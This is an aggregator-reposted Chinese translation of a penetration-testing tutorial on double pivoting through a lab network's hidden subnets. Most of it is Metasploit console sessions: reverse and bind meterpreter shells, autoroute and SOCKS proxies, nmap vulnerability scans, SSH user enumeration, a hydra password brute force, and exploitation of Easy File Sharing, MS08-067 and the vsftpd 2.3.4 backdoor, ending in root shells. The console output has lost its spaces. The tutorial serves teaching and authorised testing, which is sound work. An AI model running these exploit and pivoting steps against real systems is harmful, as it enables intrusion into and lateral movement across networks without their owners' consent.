Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【技术分享】多重转发渗透隐藏内网

0
0
【技术分享】多重转发渗透隐藏内网

2017-02-28 16:43:31
来源:pentest.blog 作者:quanyechavshuo

阅读:882次
点赞(0)
收藏





【技术分享】多重转发渗透隐藏内网
作者:quanyechavshuo

预估稿费:150RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿


0x00 About

内网机器如下:


【技术分享】多重转发渗透隐藏内网

说明:

1)Attacker为攻击者,有一个网卡,网段为172.16.0.0,Attacker系统为kali系统

2)RD为第一个已经渗透的目标,有两块网卡,对应172.16.0.0和7.7.7.0两个网段

3)JC有两块网卡,对应7.7.7.0和8.8.8.0两个网段,JC有ms08-067和efsbof两个漏洞,可getshell

4)SK有一块网卡,对应8.8.8.0网段,SK有vsftpd的漏洞,可getshell

5)起初Attacker只拿到RD的msf的shell,对于目标内网情况一无所知,也不知道存在7.7.7.0和8.8.8.0这两个隐藏的网段

6)目标是准备通过RD来渗透内网中7.7.7.0和8.8.8.0两个隐藏的网段

0x01 Step1

Attacker在RD上通过webshell运行了一个reverse类型的后门,然后操作如下:

msf>useexploit/multi/handler msfexploit(handler)>setpayloadwindows/meterpreter/reverse_tcp payload=>windows/meterpreter/reverse_tcp msfexploit(handler)>setLHOST172.16.0.20 LHOST=>172.16.0.20msfexploit(handler)>setLPORT1234 LPORT=>1234msfexploit(handler)>run [*]StartedreverseTCPhandleron172.16.0.20:1234 [*]Startingthepayloadhandler... [*]Sendingstage(957487bytes)to172.16.0.11 [*]Meterpretersession2opened(172.16.0.20:1234->172.16.0.11:49162)meterpreter>ifconfig Interface1============ Name:SoftwareLoopbackInterface1HardwareMAC:00:00:00:00:00:00MTU:4294967295IPv4Address:127.0.0.1IPv4Netmask:255.0.0.0IPv6Address:::1IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface11============ Name:Intel(R)PRO/1000MTDesktopAdapter HardwareMAC:08:00:27:e1:3f:af MTU:1500IPv4Address:172.16.0.11IPv4Netmask:255.255.255.0Interface19============ Name:Intel(R)PRO/1000MTDesktopAdapter#2HardwareMAC:08:00:27:7f:3c:fe MTU:1500IPv4Address:7.7.7.11IPv4Netmask:255.255.255.0

0x02 Step2

发现RD有两块网卡后,想办法渗透另一个网段7.7.7.0,首先要添加路由[不添加路由也可以直接用meterpreter shell中的模块访问 到7.7.7.x网段,添加路由的目的是为了使得msf模块可以访问到7.7.7.x网段],meterpreter shell可以访问到7.7.7.x网段,msf 中的模块不能访问到7.7.7.x网段,msf中的模块所处的ip是攻击者的ip,meterpreter shell所处的ip是RD的ip.在meterpreter中 添加路由的目的是为了给msf模块作代理,也即给Attacker作代理,但是只能给Attacker的msf模块作代理,要想给Attacker的其他 应用程序作代理,则需要在meterpreter添加路由后再运行msf的开启sock4的模块,然后再用proxychains来设置Attacker的其他 应用程序的代理为msf的开启sock4代理模块中设置的代理入口。

操作如下:

meterpreter>runautoroute-s7.7.7.0/24[*]Addingarouteto7.7.7.0/255.255.255.0... [+]Addedrouteto7.7.7.0/255.255.255.0via172.16.0.11[*]Usethe-poptiontolistallactiveroutes meterpreter>runautoroute-p ActiveRoutingTable ==================== SubnetNetmaskGateway --------------------7.7.7.0255.255.255.0Session2meterpreter>

然后开始扫描7.7.7.0网段,操作如下:

meterpreter>runpost/windows/gather/arp_scannerRHOSTS=7.7.7.0/24[*]RunningmoduleagainstDISCORDIA [*]ARPScanning7.7.7.0/24[*]IP:7.7.7.11MAC08:00:27:7f:3c:fe(CADMUSCOMPUTERSYSTEMS) [*]IP7.7.7.12MAC08:00:27:3a:b2:c1(CADMUSCIMPUTERSYSTEMS) [*]IP:7.7.7.20MAC08:00:27:fa:a0:c5(CADMUSCOMPUTERSYSTEMS) [*]IP:7.7.7.255MAC08:00:27:3f:2a:b5(CADMUSCOMPUTERSYSTEMS) meterpreter> arp_scanner不太够用,不能扫到端口信息[此时也可用msf自带的其他可以扫描端口的模块如auxiliary/scanner/portscan/tcp来扫 描,因为前面添加了路由,使得msf中的模块可以用meterpreter作为代理访问到7.7.7.x网段],于是用Attacker本机的nmap来扫[可以 更完全的扫描,nmap应该比msf中的扫描模块强大],首先在RD上开sockets4代理,然后用proxychains设置nmap的代理为msf模块开 启的Attacker的1080端口提供的代理,操作如下: meterpreter>background [*]Backgroundingsession2... msf>useauxiliary/server/socks4a msfauxiliary(socks4a)>showoptions Moduleoptions(auxiliary/server/socks4a): NameCurrentSettingRequiredDescription -------------------------------------- SRVHOST0.0.0.0yesTheaddresstolistenon SRVPORT1080yesTheporttolistenon. Auxiliaryaction: NameDescription --------------- Proxy msfauxiliary(socks4a)>setsrvhost172.16.0.20 srvhost=>172.16.0.20msfauxiliary(socks4a)>run [*]Auxiliarymoduleexecutioncompleted [*]Startingthesocks4aproxyserver msfauxiliary(socks4a)>netstat-antp|grep1080 [*]exec:netstat-antp|grep1080 tcp0172.16.0.20:10800.0.0.0:*LISTEN3626/ruby msfauxiliary(socks4a)>

proxychains设置/etc/proxychains.conf如下:

[ProxyList]#addproxyhere...#meanwile#defaultssetto"tor"#socks4127.0.0.19050socks4172.16.0.201080

nmap扫描如下:

root@kali:~#proxychainsnmap-sT-sV-Pn-n-p22,80,135,139,445--script=smb-vuln-ms08-067.nse7.7.7.20ProxyChains-3.1(http://proxychains.sf.net)StartingNmap7.25BETA1(https://nmap.org)|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK Nmapscanreportfor7.7.7.20Hostisup(0.17slatency). PORTSTATESERVICEVERSION 22/tcpopensshBitviseWinSSHD7.16(FlowSsh7.15;protocol2.0)80/tcpclosedhttpEasyFileSharingWebServerhttpd6.9 135/tcpopenmsrpcMicrosoftWindowsRPC 139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn 445/tcpopenmicrosoft-dsMicrosoftWindows2003or2008microsoft-ds ServiceInfo:OS:Windows;CPE:cpe:/o:microsoft:windows,cpe:/o:microsoft:windows_server_2003 Hostscriptresults: |smb-vuln-ms08-067: |VULNERABLE: |MicrosoftWindowssystemvulnerabletoremotecodeexecution(MS08-067)|State:VULNERABLE |IDs:CVE:CVE-2008-4250 |TheServerserviceinMicrosoftWindows2000SP4,XPSP2andSP3,Server2003SP1andSP2, |VistaGoldandSP1,Server2008,and7Pre-Betaallowsremoteattackerstoexecutearbitrary |codeviaacraftedRPCrequestthattriggerstheoverflowduringpathcanonicalization. | |Disclosuredate:2008-10-23 |References: |https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250|_https://technet.microsoft.com/en-us/library/security/ms08-067.aspxServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress(1hostup)scannedin12.51seconds root@kali:~#

现在发现了7.7.7.20(JC)这台机器端口开放比较多,尝试找出JC的漏洞,操作如下: 首先看看JC的80端口运行了什么cms,但是Attacker的浏览器直接访问http://172.16.0.20会无法访问,因为Attacker的网段与JC 不在同一网段,此处有个要注意的内容:

Attention:可以选择使用proxychains设置Attacker的浏览器的代理为Attacker的1080端口的socks4代理入口,也可通过在RD的meterpreter会 话中运行portfwd模块命令,portfwd命令如下:

meterpreter>portfwdadd-L172.16.0.20-l2323-p80-r7.7.7.20[*]LocalTCPrelaycreated:172.16.0.20:2323<->7.7.7.20:80meterpreter> meterpreter>portfwdlistActivePortForwards ==================== IndexLocalRemoteDirection -------------------------1172.16.0.20:23237.7.7.20:80Forward1totalactiveportforwards. meterpreter>

通过访问Attacker的2323端口访问JC的80端口,结果如下:


【技术分享】多重转发渗透隐藏内网

这里的portfwd模块不只是名字上的端口转发的意思,目前笔者认为portfwd相当于半个ssh正向代理加一个ssh反向代理组成的综合命令,ssh正向反向代理可参考这里的理解 。ssh正向反向代理理解笔者认为portfwd命令之后Attacker可以通过访问Attacker本身ip的2323端口进而访问到JC的80端口期间发生了3件事。

1.RD访问JC的80端口,这里相当于半个ssh正向代理

2.RD绑定已经访问到的JC的80端口的数据到Attacker的2323端口,这里相当于一个ssh反向代理,相当于RD有Attacker的ssh权限

3.攻击者的浏览器访问攻击者自己的172.16.0.20:2323

portfwd的用法如下:

meterpreter>portfwd-h Usage:portfwd[-h][add|delete|list|flush][args] OPTIONS: -L>opt>Thelocalhosttolistenon(optional). -hHelpbanner. -l>opt>Thelocalporttolistenon. -p>opt>Theremoteporttoconnecton. -r>opt>Theremotehosttoconnecton. meterpreter>

其中-L只能设置为攻击者的ip,不能设置为肉鸡的ip,-L设置的ip可以是攻击者的内网ip,-r也可以是目标的内网ip,两个内网之 间通过meterpreter会话的"隧道"来连通,如果-L后设置的ip是攻击者的内网ip,-r后设置的是目标机器的内网ip,portfwd通过 meterpreter会话连通两台,-l是指攻击者的监听端口,运行完上面的portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20 命令后,Attacker的2323端口将变成监听状态(也即Attacker会开启2323端口) 这里还要注意route add命令只能是在meterpreter会话中有效,不能系统全局有效,笔者认为route add也是通过meterpreter会 话的"隧道"来实现攻击者能够访问目标机器其他网段机器的,也即在上面的Attacker通过portfwd来实现访问目标机器其他网段 机器而不能因为在portfwd模块运行前由于已经运行了route add模块而由Attacker的浏览器直接访问目标7.7.7.20:80,因为 route add只会给msf的模块提供meterpreter会话通道作为代理服务,只有meterpreter会话下可用的模块可以直接访问7.7.7.x 网段,Attacker的浏览器想直接访问7.7.7.20需要使用proxychins和msf开启的sock4代理.

上面访问得到目标机器JC的80端口信息看出JC运行的是Eash File Sharing Web Server,可用msf中的模块尝试getshell,操作如 下(如果没有在meterpreter中添加路由msf是访问不到7.7.7.20的):

msf>useexploit/windows/http/easyfilesharing_seh msfexploit(easyfilesharing_seh)>showoptions Moduleoptions(exploit/windows/http/easyfilesharing_seh): NameCurrentSettingRequiredDescription -------------------------------------- RHOSTyesThetargetaddress RPORT80yesThetargetport Exploittarget: IdName ------ 0EasyFileSharing7.2HTTP msfexploit(easyfilesharing_seh)>setrhost7.7.7.20 rhost=>7.7.7.20msfexploit(easyfilesharing_seh)>setpayloadwindows/meterpreter/bind_tcp payload=>windows/meterpreter/bind_tcp msfexploit(easyfilesharing_seh)>run [*]Startedbindhandler [*]7.7.7.20:80-7.7.7.20:80-Sendingexploit... [+]7.7.7.20:80-ExploitSent [*]Sendingstage(957999bytes)to7.7.7.20 [*]Meterpretersession2opened(172.16.0.20-172.16.0.11:0->7.7.7.20:4444)at2016-12-2614:21:11+0300

或者从JC(7.7.7.20)22端口入手:

msf>useauxiliary/scanner/ssh/ssh_enumusers msfauxiliary(ssh_enumusers)>setrhosts7.7.7.20rhosts=>7.7.7.20msfauxiliary(ssh_enumusers)>setrport22rport=>22msfauxiliary(ssh_enumusers)>setuser_file/usr/share/wordlists/metasploit/default_users_for_services_unhash.txt user_file=>/usr/share/wordlists/metasploit/default_users_for_services_unhash.txt msfauxiliary(ssh_enumusers)>run [*]7.7.7.20:22-SSH-Checkingforfalsepositives [*]7.7.7.20:22-SSH-Startingscan [+]7.7.7.20:22-SSH-User'admin'found [-]7.7.7.20:22-SSH-User'root'notfound [-]7.7.7.20:22-SSH-User'Administrator'notfound [+]7.7.7.20:22-SSH-User'sysadm'found [-]7.7.7.20:22-SSH-User'tech'notfound [-]7.7.7.20:22-SSH-User'operator'notfound [+]7.7.7.20:22-SSH-User'guest'found [-]7.7.7.20:22-SSH-User'security'notfound [-]7.7.7.20:22-SSH-User'debug'notfound [+]7.7.7.20:22-SSH-User'manager'found [-]7.7.7.20:22-SSH-User'service'notfound [-]7.7.7.20:22-SSH-User'!root'notfound [+]7.7.7.20:22-SSH-User'user'found [-]7.7.7.20:22-SSH-User'netman'notfound [+]7.7.7.20:22-SSH-User'super'found [-]7.7.7.20:22-SSH-User'diag'notfound [+]7.7.7.20:22-SSH-User'Cisco'found [-]7.7.7.20:22-SSH-User'Manager'notfound [+]7.7.7.20:22-SSH-User'DTA'found [-]7.7.7.20:22-SSH-User'apc'notfound [+]7.7.7.20:22-SSH-User'User'found [-]7.7.7.20:22-SSH-User'Admin'notfound [+]7.7.7.20:22-SSH-User'cablecom'found [-]7.7.7.20:22-SSH-User'adm'notfound [+]7.7.7.20:22-SSH-User'wradmin'found [-]7.7.7.20:22-SSH-User'netscreen'notfound [+]7.7.7.20:22-SSH-User'sa'found [-]7.7.7.20:22-SSH-User'setup'notfound [+]7.7.7.20:22-SSH-User'cmaker'found [-]7.7.7.20:22-SSH-User'enable'notfound [+]7.7.7.20:22-SSH-User'MICRO'found [-]7.7.7.20:22-SSH-User'login'notfound [*]Caughtinterruptfromtheconsole... [*]Auxiliarymoduleexecutioncompleted ^C msfauxiliary(ssh_enumusers)>

然后用hydra本地用msf模块开启的1080端口的sock4代理尝试爆破:

root@kali:~#proxychainshydra7.7.7.20ssh-s22-L/tmp/user.txt-Ptop100.txt-t4 ProxyChains-3.1(http://proxychains.sf.net) Hydrav8.2(c)2016byvanHauser/THC-Pleasedonotuseinmilitaryorsecretserviceorganizations,orforillegalpurposes. Hydra(http://www.thc.org/thc-hydra)starting [WARNING]Restorefile(./hydra.restore)fromaprevioussessionfound,topreventoverwriting,youhave10secondstoabort... [DATA]max4tasksper1server,overall64tasks,20logintries(l:2/p:10),~0triespertask [DATA]attackingservicesshonport22 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK<><>-OK<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK [22][ssh]host:7.7.7.20login:adminpassword:123456 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 1of1targetsuccessfullycompleted,1validpasswordfound Hydra(http://www.thc.org/thc-hydra)finished root@kali:~#

发现有可用帐户密码admin:123456,然后再用sock4代理ssh登录:

root@kali:~#proxychainssshadmin@7.7.7.20 ProxyChains-3.1(http://proxychains.sf.net) |D-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK Theauthenticityofhost'7.7.7.20(7.7.7.20)'can'tbeestablished. ECDSAkeyfingerprintisSHA256:Rcz2KrPF3BTo16Ng1kET91ycbr9c8vOkZcZ6b4VawMQ. Areyousureyouwanttocontinueconnecting(yes/no)?yes Warning:Permanentlyadded'7.7.7.20'(ECDSA)tothelistofknownhosts. admin@7.7.7.20'spassword: bvshell:/C/DocumentsandSettings/AllUsers$pwd /C/DocumentsandSettings/AllUsers bvshell:/C/DocumentsandSettings/AllUsers$dir 2016-12-2421:32<DIR>ApplicationData 2016-12-2506:16<DIR>Desktop 2016-12-2418:36<DIR>Documents 2016-12-2418:37<DIR>DRM 2016-12-2421:32<DIR>Favorites 2016-12-2418:38<DIR>StartMenu 2016-12-2421:32<DIR>Templates 0Files0bytes 7Directories bvshell:/C/DocumentsandSettings/AllUsers$

或者用ms08067:

msf>useexploit/windows/smb/ms08_067_netapi msfexploit(ms08_067_netapi)>showoptions Moduleoptions(exploit/windows/smb/ms08_067_netapi): NameCurrentSettingRequiredDescription -------------------------------------- RHOSTyesThetargetaddress RPORT445yesTheSMBserviceport SMBPIPEBROWSERyesThepipenametouse(BROWSER,SRVSVC) Exploittarget: IdName ------0AutomaticTargeting msfexploit(ms08_067_netapi)>setrhost7.7.7.20rhost=>7.7.7.20msfexploit(ms08_067_netapi)>setpayloadwindows/meterpreter/bind_tcp payload=>windows/meterpreter/bind_tcp msfexploit(ms08_067_netapi)>showoptions Moduleoptions(exploit/windows/smb/ms08_067_netapi): NameCurrentSettingRequiredDescription -------------------------------------- RHOST7.7.7.20yesThetargetaddress RPORT445yesTheSMBserviceport SMBPIPEBROWSERyesThepipenametouse(BROWSER,SRVSVC) Payloadoptions(windows/meterpreter/bind_tcp): NameCurrentSettingRequiredDescription -------------------------------------- EXITFUNCthreadyesExittechnique(Accepted:'',seh,thread,process,none) LPORT4444yesThelistenport RHOST7.7.7.20noThetargetaddress Exploittarget: IdName ------0AutomaticTargeting msfexploit(ms08_067_netapi)>run [*]Startedbindhandler [*]7.7.7.20:445-Automaticallydetectingthetarget... [*]7.7.7.20:445-Fingerprint:Windows2003-ServicePack2-lang:Unknown [*]7.7.7.20:445-Wecouldnotdetectthelanguagepack,defaultingtoEnglish [*]7.7.7.20:445-SelectedTarget:Windows2003SP2English(NX) [*]7.7.7.20:445-Attemptingtotriggerthevulnerability... [*]Sendingstage(957999bytes)to7.7.7.20[*]Meterpretersession2opened(172.16.0.20-172.16.0.11:0->7.7.7.20:4444) meterpreter>

成功溢出getshell后查看JC(7.7.7.20)网卡信息:

meterpreter>ipconfigInterface1============Name:MSTCPLoopbackinterfaceHardwareMAC:00:00:00:00:00:00MTU:1520IPv4Address:127.0.0.1Interface65539============Name:Intel(R)PRO/1000MTDesktopAdapterHardwareMAC:08:00:27:29:cd:cbMTU:1500IPv4Address:8.8.8.3IPv4Netmask:255.255.255.0Interface65540============Name:Intel(R)PRO/1000MTDesktopAdapter#2HardwareMAC:08:00:27:e3:47:43MTU:1500IPv4Address:7.7.7.20IPv4Netmask:255.255.255.0meterpreter> 发现又出现一个8.8.8.x的网段,于是将这个网段添加路由,以便msf中的模块可以访问到8.8.8.x网段.

0x03 Step3

先直接用新的meterpreter shell看看8.8.8.x这个网段有什么机器

meterpreter>runpost/windows/gather/arp_scannerRHOSTS=8.8.8.0/24[*]RunningmoduleagainstSRV03[*]ARPScanning8.8.8.0/24[*]IP:8.8.8.3MAC08:00:27:29:cd:cb(CADMUSCOMPUTERSYSTEMS)[*]IP:8.8.8.1MAC0a:00:27:00:00:03(UNKNOWN)[*]IP:8.8.8.9MAC08:00:27:56:f1:7c(CADMUSCOMPUTERSYSTEMS)[*]IP:8.8.8.13MAC08:00:27:13:a3:b1(CADMUSCOMPUTERSYSTEMS)

为了让msf中所有模块都能访问到8.8.8.x网段,在新的meterpreter会话中添加路由:

meterpreter>runautoroute-s8.8.8.0/24[*]Addingarouteto8.8.8.0/255.255.255.0...[+]Addedrouteto8.8.8.0/255.255.255.0via7.7.7.20[*]Usethe-poptiontolistallactiveroutes

为了让Attacker的除了msf模块以外的其他应用程序能访问到8.8.8.x网段,再使用msf的开启sock4代理的模块开启另外一个端口 作为8.8.8.x网段的入口:

msfexploit(ms08_067_netapi)>useauxiliary/server/socks4a msfauxiliary(socks4a)>showoptions Moduleoptions(auxiliary/server/socks4a): NameCurrentSettingRequiredDescription -------------------------------------- SRVHOST172.16.0.20yesTheaddresstolistenon SRVPORT1080yesTheporttolistenon. Auxiliaryaction: NameDescription --------------- Proxy msfauxiliary(socks4a)>setSRVPORT1081SRVPORT=>1081msfauxiliary(socks4a)>run [*]Auxiliarymoduleexecutioncompleted [*]Startingthesocks4aproxyserver msfauxiliary(socks4a)>

也即现在Attacker本地的1080端口的代理可以访问到7.7.7.x网段,1081端口的代理可以访问到8.8.8.x网段,然后将新开的端口 添加到proxychains的配置文件中:


root@kali:~#cat/etc/proxychains.conf|grep-v"#"dynamic_chainproxy_dnstcp_read_time_out15000tcp_connect_time_out8000socks4172.16.0.201080#FirstPivotsocks4172.16.0.201081#SecondPivot

上面的两个代理相当于扇门的钥匙,172.16.0.20:1080是7.7.7.x的钥匙,172.16.0.20:1081是7.7.7.x后面的8.8.8.x的钥匙 ,Attacker要想访问到8.8.8.x可以通过先打开7.7.7.x的门,再打开8.8.8.x的门(因为8.8.8.x这个门在7.7.7.x这个门之后)

使用Attacker本地的nmap扫描下8.8.8.x网段:

root@kali:~#proxychainsnmap-sT-sV-p21,22,23,808.8.8.9-n-Pn-vvProxyChains-3.1(http://proxychains.sf.net)StartingNmap7.25BETA1(https://nmap.org)NmapwishesyouamerryChristmas!Specify-sXforXmasScan(https://nmap.org/book/man-port-scanning-techniques.html).NSE:Loaded36scriptsforscanning. InitiatingConnectScan Scanning8.8.8.9[4ports] |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK Discoveredopenport21/tcpon8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK Discoveredopenport23/tcpon8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK Discoveredopenport22/tcpon8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Discoveredopenport80/tcpon8.8.8.9CompletedConnectScanat05:54,1.37selapsed(4totalports)InitiatingServicescanat05:54 Scanning4serviceson8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK CompletedServicescanat05:54,11.09selapsed(4serviceson1host)NSE:Scriptscanning8.8.8.9. NSE:Startingrunlevel1(of2)scan. InitiatingNSEat05:54 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK CompletedNSEat05:54,1.71selapsed NSE:Startingrunlevel2(of2)scan. InitiatingNSEat05:54 CompletedNSEat05:54,0.00selapsed Nmapscanreportfor8.8.8.9 Hostisup,receiveduser-set(0.41slatency). Scanned PORTSTATESERVICEREASONVERSION 21/tcpopenftpsyn-ackvsftpd2.3.4 22/tcpopensshsyn-ackOpenSSH4.7p1Debian8ubuntu1(protocol2.0)23/tcpopentelnetsyn-acklinuxtelnetd 80/tcpopenhttpsyn-ackApachehttpd2.2.8((Ubuntu)DAV/2) ServiceInfo:OSs:Unix,Linux;CPE:cpe:/o:linux:linux_kernel Readdatafilesfrom:/usr/bin/../share/nmap Servicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress(1hostup)scannedin14.59seconds root@kali:~#

发现8.8.8.9(SK)这台机器可能有漏洞,用msf模块尝试getshell:

msf>msf>useexploit/unix/ftp/vsftpd_234_backdoormsfexploit(vsftpd_234_backdoor)>showoptionsModuleoptions(exploit/unix/ftp/vsftpd_234_backdoor):NameCurrentSettingRequiredDescription--------------------------------------RHOSTyesThetargetaddressRPORT21yesThetargetportExploittarget:IdName------0Automaticmsfexploit(vsftpd_234_backdoor)>setrhost8.8.8.9rhost=>8.8.8.9msfexploit(vsftpd_234_backdoor)>run[*]8.8.8.9:21-Banner:220(vsFTPd2.3.4)[*]8.8.8.9:21-USER:331Pleasespecifythepassword.[+]8.8.8.9:21-Backdoorservicehasbeenspawned,handling...[+]8.8.8.9:21-UID:uid=0(root)gid=0(root)[*]Foundshell.[*]Commandshellsession4opened(LocalPipe->RemotePipe)pwd/iduid=0(root)gid=0(root)ifconfigeth0Linkencap:EthernetHWaddr08:00:27:56:f1:7cinetaddr:8.8.8.9Bcast:8.8.8.255Mask:255.255.255.0inet6addr:fe80::a00:27ff:fe56:f17c/64Scope:LinkUPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1RXpackets:10843errors:0dropped:0overruns:0frame:0TXpackets:2779errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:1000RXbytes:1081842(1.0MB)TXbytes:661455(645.9KB)Baseaddress:0xd010Memory:f0000000-f0020000loLinkencap:LocalLoopbackinetaddr:127.0.0.1Mask:255.0.0.0inet6addr:::1/128Scope:HostUPLOOPBACKRUNNINGMTU:16436Metric:1RXpackets:18161errors:0dropped:0overruns:0frame:0TXpackets:18161errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:0RXbytes:5307479(5.0MB)TXbytes:5307479(5.0MB)

【技术分享】多重转发渗透隐藏内网
【技术分享】多重转发渗透隐藏内网
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://pentest.blog/explore-hidden-networks-with-double-pivoting/

Viewing all articles
Browse latest Browse all 12749